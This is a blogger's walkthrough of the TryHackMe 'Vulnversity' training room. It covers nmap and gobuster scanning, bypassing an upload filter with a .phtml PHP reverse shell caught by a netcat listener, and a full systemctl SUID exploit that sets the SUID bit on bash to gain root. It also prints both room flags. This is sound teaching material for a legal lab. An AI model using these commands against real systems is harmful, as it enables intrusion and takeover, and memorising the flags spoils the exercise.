4 minutes
THM_Vulnversity_Walkthrough
Vulnversity Walkthrough TryHackMe
performed by: jb-williams
Reconnaisance
They first ask for you to search for any nmap
resourses(cheatsheets) online, I came across this one that seemed really useful:
https://www.stationx.net/nmap-cheat-sheet/
The First Real Question
Scan the box, how many ports are open?
I like to build up a chain of commands for most boxes.
- While doing my scans I like to create a file that contains just the numerical port values to have. So my command came out like this:
nmap -v -T4 -sV -sC -oA nmap/initial 10.10.124.14 && grep -i "open" nmap/initial.nmap | cut -d' ' -f 1 | cut -d'/' -f1 | tee nmap/ports.txt | wc -l
- Number of ports open:
6
What version of the squid proxy
is running on the machine?
grep -i "squid" nmap/initial.nmap | awk '{print $NF}'
- Version of Squid Proxy:
3.5.12
How many ports will nmap scan if the flag -p-400 is used?
- Looking at man page or online resource:
400
Using the nmap flag -n what will it not resolve?
- Looking at man page or online resource:
DNS
What is the most likely operating system this machine is running?
grep -i "os" nmap/initial.nmap
- Quickly scanning output, you can see that:
Ubuntu
is listed most.
What port is the web server running on?
grep -i "http" nmap/initial.nmap
- Http server is on port:
3333
Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)
Locating directories using GoBuster
Using gobuster
:
GoBuster flag | Description |
---|---|
-e | Print the full URLs in your console |
-u | The target URL |
-w | Path to your wordlist |
-U and -P | Username and Password for Basic Auth |
-p | Proxy to use for requests |
-c | Specify a cookie for simulating your auth |
What is the directory that has an upload form page?
gobuster dir -u http://10.10.124.148:3333 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster.txt -t 15
I like using feroxbuster
and it let me know more info esp. about the dir path sooner
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -e -u http://10.10.124.148:3333/
- The directory that has an upload form page is:
/internal/
and/internal/uploads
(but they don’t ask for this one, its just important to know about later)
Compromise the webserver
After finding the form to upload files:
What file type, which you’d wnat to upload to exploit the server, is blocked? Try a couple to find out.*
- Fist, trying to upload a reverse shell: this was blocked
reverseshell.php
-
The room walks you through using
burp
to fuzz the upload for, I wrote a python script to fuzz for me.: -
Url for the room to follow the
burp
walkthrough: -
After testing different php file extensions, using curl,python,burp,zap to fuzz the upload form, you come across this one working:
.phtml
-
Download this PHP revsere shell downloadLink -
php-reverse-shell.phtml
- Edit the file changing the IP to your
tun0
THM IP and desired port. - Setup a listener on the port specified in the reverse shell ex:
nc -lnvp 4444
- Upload the reverse shell on the upload form and navigate here to execute the payload
http://<IP>:3333/internal/uploads/php-reverse-shell.phtml
What is the name of the user who managers the webserver?*
-
Once on the machine:
-
Ls the
/home
dir and see user:bill
-
What is the user flag?
-
Ls
/home/bill
and seeuser.txt
cat /home/bill/user.txt
- The contents of
user.txt
:8bd7992fbe8a6ad22a63361004cfcedb
Privilage Escalation
Per THM -
In Linux, SUID (set owner userId upon execution) is a special type of file permission given to a file. SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.
On the system search for all SUID files. What file stands out?
- I tend to use this
find
command to search for SUID’s
find / -perm -4000 2>/dev/null
- Sort of using my own system as a reference, I saw this one looking fairly unusual:
/bin/systemctl
Become root and get the last flag (/root/root.txt)
- Navigating to GTFOBins and search for that bin file.
- I took the
Sudo (b)
one and modified it
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
- I literally copy/pasted that chunk into my terminal and ran it.
- Then I ran
bash -p
to escalate toroot
- As root you can ls the
/root
dir:ls /root
and seeroot.txt
- Cat out root.txt
cat /root/root.txt
- The contents of root.txt:
a58ff8579f0a9270368d33a9966c7fd5
written and performed by jb-williams - github
linux pentest escalation SUID scanning burb gobuster feroxbuster tryhackme vulnversity walkthrough file-upload php
823 Words
2023-04-11 15:50